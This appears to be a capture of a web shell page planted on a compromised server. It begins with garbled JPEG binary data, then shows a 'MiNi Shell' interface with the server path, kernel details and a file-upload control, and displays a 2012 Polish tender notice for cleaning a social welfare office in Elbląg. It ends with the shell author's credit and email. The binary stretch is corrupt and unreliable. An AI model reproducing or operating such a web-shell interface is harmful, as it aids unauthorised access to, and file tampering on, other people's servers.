JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121220/521682-N-2012.html

<p class="kh_header"><b>Elbląg: Sprzątanie pomieszczeń biurowych Miejskiego Ośrodka Pomocy Społecznej w Elblągu</b><br>
<b>Numer ogłoszenia: 521682 - 2012; data zamieszczenia: 20.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Winna 9, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 2306000, faks 055 2306002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.elblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie pomieszczeń biurowych Miejskiego Ośrodka Pomocy Społecznej w Elblągu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług sprzątania biura i jego otoczenia.
1) Przedmiot zamówienia obejmuje:
A: świadczenie usług sprzątania pomieszczeń biurowych Miejskiego Ośrodka Pomocy Społecznej w Elblągu, przy ul. Winnej 9, o łącznej powierzchni 1.410,80 m.kw., oraz 2 tarasów o łącznej powierzchni 40 m.kw., obejmujących: 
a) pomieszczenia z podłogą pokrytą terakotą (powierzchnia łączna 339,50 m.kw.), w tym 17 pomieszczeń WC (1 łazienka i 16 toalet) o łącznej powierzchni 102 m.kw., klatki schodowe i wiatrołapy o łącznej powierzchni 229,40 m.kw. i 2 pomieszczenia gospodarcze o łącznej powierzchni 8,10 m.kw.;
b) pomieszczenia z wykładziną typu tarkett (powierzchnia łączna 1.035,70 m.kw.), w tym 214 m.kw. ciągów komunikacyjnych (korytarzy) i 752,60 m.kw. pomieszczeń biurowych (41 pokoi biurowych) oraz 69,10 m.kw. sala konferencyjna,
c) pomieszczenia biurowe (2 pokoje biurowe) z wykładziną dywanową o łącznej powierzchni 35,60 m.kw.;
d) 98 okien o łącznej powierzchni 138,64 m.kw., w tym 15 okien połaciowych o łącznej powierzchni 9,58 m.kw. oraz dodatkowo 13 drzwi balkonowych o łącznej powierzchni 27,5 m.kw. Ogółem łączna powierzchnia okien i drzwi balkonowych do czyszczenia (czyszczenie dwustronne): 332,28 m.kw. 
B: całoroczne bieżące utrzymanie porządku i czystości wokół budynku położonego w Elblągu przy ul Winnej 9,
C: zimowe utrzymanie chodnika o łącznej powierzchni 136,50 mkw., w tym utrzymanie chodnika wzdłuż nieruchomości od strony ul. Winnej z dojściem do budynku o powierzchni 126 mkw. oraz utrzymanie chodnika wzdłuż nieruchomości od strony ul. Zacisze z dojściem do budynku o powierzchni 10,50 mkw.
D: odśnieżanie w miarę potrzeby, po uprzednim uzgodnieniu z Zamawiającym, w razie wystąpienia intensywnych opadów śniegu, chodnika wzdłuż nieruchomości wraz z dojściami do budynku o łącznej powierzchni 136,50 mw. oraz parkingu o powierzchni 306 mkw. i przylegającego do tego parkingu chodnika o powierzchni 27 mkw.
2) Zakres prac obejmuje: 
a) sprzątanie w dni robocze pomieszczeń biurowych (w godzinach od 15.30 do 19.00, oprócz pomieszczeń kasy - w godzinach od 14.00 do 15. 30)
- zamiatanie i zmywanie powierzchni podłogowych oraz czyszczenie wykładzin dywanowych, 
- wycieranie kurzu z mebli, parapetów i urządzeń biurowych, listew ściennych, drzwi i przeszkleń itp.,
- obmiatanie ścian i sufitów z kurzu i pajęczyn,
- opróżnianie i czyszczenie pojemników na śmieci oraz wyposażanie ich w worki na śmieci,
b) sprzątanie w dni robocze toalet (w godzinach od 15.30 do 19.00):
- dezynfekcja i mycie muszli klozetowych oraz pisuarów,
- czyszczenie luster,
- czyszczenie umywalek i armatury,
- czyszczenie glazury łazienkowej,
- zamiatanie i zmywanie powierzchni podłogowych,
- wycieranie kurzu z parapetów, listew ściennych, drzwi i przeszkleń, itp.
- obmiatanie ścian i sufitów z kurzu i pajęczyn,
- opróżnianie i czyszczenie pojemników na śmieci oraz wyposażanie ich w worki na śmieci,
- wyposażanie w miarę potrzeb: 
* pojemników na ręczniki we wkłady: ręczniki papierowe, składane, jednowarstwowe, o wymiarach 330 mm x 250 mm;
* pojemników na papier toaletowy we wkłady: papier toaletowy w rolce, jednowarstwowy, o średnicy 190 mm, wymiarach 245m x 95 mm, gramaturze 27 g/mkw.,
* pojemników na mydło w płynie we wkłady: mydło w płynie z gliceryną. 
Uwaga: w budynku zatrudnionych jest 80 osób. Powyższy stan zatrudnienia należy uwzględnić przy szacowaniu ilości potrzebnych wkładów do pojemników.
c) sprzątanie w dni robocze korytarzy, klatek schodowych, wiatrołapów i pozostałych pomieszczeń (w godzinach od 15.30 do 19.00):
- zamiatanie i zmywanie powierzchni podłogowych,
- wycieranie kurzu z parapetów, listew ściennych, poręczy, drzwi i przeszkleń itp.
- obmiatanie ścian i sufitów z kurzu i pajęczyn,
d) wykonywanie pozostałych prac wewnętrznych (w godzinach od 15.30 do 19.00):
- mycie powierzchni drzwi oraz poręczy - w miarę potrzeb, nie rzadziej niż 1 raz na miesiąc,
- pranie żaluzji pionowych - 1 raz w roku,
- mycie okien i drzwi balkonowych (framug, szyb i ram okiennych od zewnątrz i od wewnątrz) - 2 razy w roku,
- pranie tapicerki - 1 raz w roku,
- mycie grzejników - po zakończeniu sezonu grzewczego,
- pastowanie i polerowanie posadzek - 1 raz na kwartał,
- akrylowanie tarkettu - 2 razy w roku.
- mycie maszynowe ciągów komunikacyjnych - 2 razy do roku,
- czyszczenie wykładzin dywanowych - 2 razy do roku,
- sprzątanie tarasów - w miarę potrzeb, nie rzadziej niż 1 raz na miesiąc.
e) zapewnienie stałej obsługi porządkowej w formie serwisu dziennego w dni robocze, przez cztery godziny dziennie, w godzinach porannych wskazanych przez Zamawiającego.
- bieżące zamiatanie i zmywanie ciągów komunikacyjnych, klatek schodowych i windy, a także ewentualne sprzątanie innych pomieszczeń w przypadku nagłej konieczności utrzymania czystości,
- całoroczne bieżące utrzymanie porządku i czystości wokół budynku położonego w Elblągu przy ul. Winnej 9, 
- zimowe utrzymanie chodnika o łącznej powierzchni 136,50 mkw., w tym utrzymanie chodnika wzdłuż nieruchomości od strony ul. Winnej z dojściem do budynku o powierzchni 126 mkw. oraz utrzymanie chodnika wzdłuż nieruchomości od strony ul. Zacisze z dojściem do budynku o powierzchni 10,50 mkw. (obejmującego odśnieżanie, posypanie materiałem szorstkim, usunięcie błota pośniegowego, skucie lodu itp.).
f) zapewnienie odśnieżenia na żądanie Zamawiającego w przypadku wystąpienia intensywnych opadów śniegu chodnika o łącznej powierzchni 136,50 mkw., w tym utrzymanie chodnika wzdłuż nieruchomości od strony ul. Winnej z dojściem do budynku o powierzchni 126 mkw. oraz utrzymanie chodnika wzdłuż nieruchomości od strony ul. Zacisze z dojściem do budynku o powierzchni 10,50 mkw., a także parkingu o powierzchni 306 mkw. i przylegającego do tego parkingu chodnika o powierzchni 27 mkw. (odejmującego odśnieżanie - w tym maszynowe, posypanie materiałem szorstkim, usunięcie błota pośniegowego, skucie lodu itp.).
2) Zamawiający wymaga, aby Wykonawca zapewnił w okresie obowiązywania umowy we własnym zakresie i na własny koszt wszelkie narzędzia, urządzenia i materiały niezbędne do należytego wykonania zamówienia, w szczególności środki czystości dostosowane do rodzaju czyszczonej powierzchni, środki dezynfekujące, odzież roboczą i środki ochrony osobistej, worki na śmieci, materiał szorstki - piasek, a także wyżej wskazane wkłady do pojemników na ręczniki, pojemników na papier toaletowy oraz pojemników na mydło w płynie.
3) Zamawiający wymaga, aby Wykonawca w trakcie realizacji zamówienia uzgadniał z Zamawiającym z wyprzedzeniem warunki i terminy wykonania prac, które mogą spowodować ograniczenia w działalności Zamawiającego.
4) Zamawiający wymaga, aby Wykonawca świadczył usługi sprzątania o określonej jakości, potwierdzonej certyfikatem jakości ISO 9001:2008 lub innym równoważnym certyfikatem.
5) Zamawiający wymaga aby przedmiot zamówienia był wykonywany przez osoby zatrudnione na umowę o pracę bądź w ramach umowy cywilnoprawnej w liczbie gwarantującej należyte wykonanie przedmiotu umowy. 
6) Zamawiający wymaga, aby Wykonawca prowadził na terenie Miasta Elbląga w okresie obowiązywania umowy punkt koordynujący, zapewniający Zamawiającemu bezpośredni kontakt z osobą upoważnioną przez Wykonawcę, odpowiedzialną za bieżące nadzorowanie wykonywania przedmiotu umowy oraz niezwłoczne przyjęcie zgłoszenia o nieprawidłowościach związanych z wykonywanymi usługami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4, 90.91.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w ust. IV pkt. A ppkt. 1 siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w ust. IV pkt. A ppkt. 1 siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w ust. IV pkt. A ppkt. 1 siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w ust. IV pkt. A ppkt. 1 siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże Zamawiającemu, że:
- znajduje się w sytuacji ekonomicznej zapewniającej wykonanie zamówienia - posiadanie polisy a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
a) potwierdzenia spełnienia tego warunku Zamawiający dokona na podstawie:
- oświadczenia wymienionego w ust. IV pkt. A ppkt. 1 siwz,
- oraz dokumentów wymienionych w ust. IV pkt. A ppkt. 2 siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Ewentualne pisemne zobowiązania innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, jeżeli Wykonawca przy wykonaniu zamówienia będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
2. Upoważnienia do zaciągania zobowiązań w imieniu Wykonawcy (do złożenia oferty w postępowaniu o udzielenie zamówienia publicznego) powinny być dołączone do oferty, o ile nie wynikają z innych dokumentów załączonych przez Wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.elblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej ul. Winna 9 82-300 Elbląg pokój nr 507.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2012 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej ul. Winna 9 82-300 Elbląg pokój nr 317 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com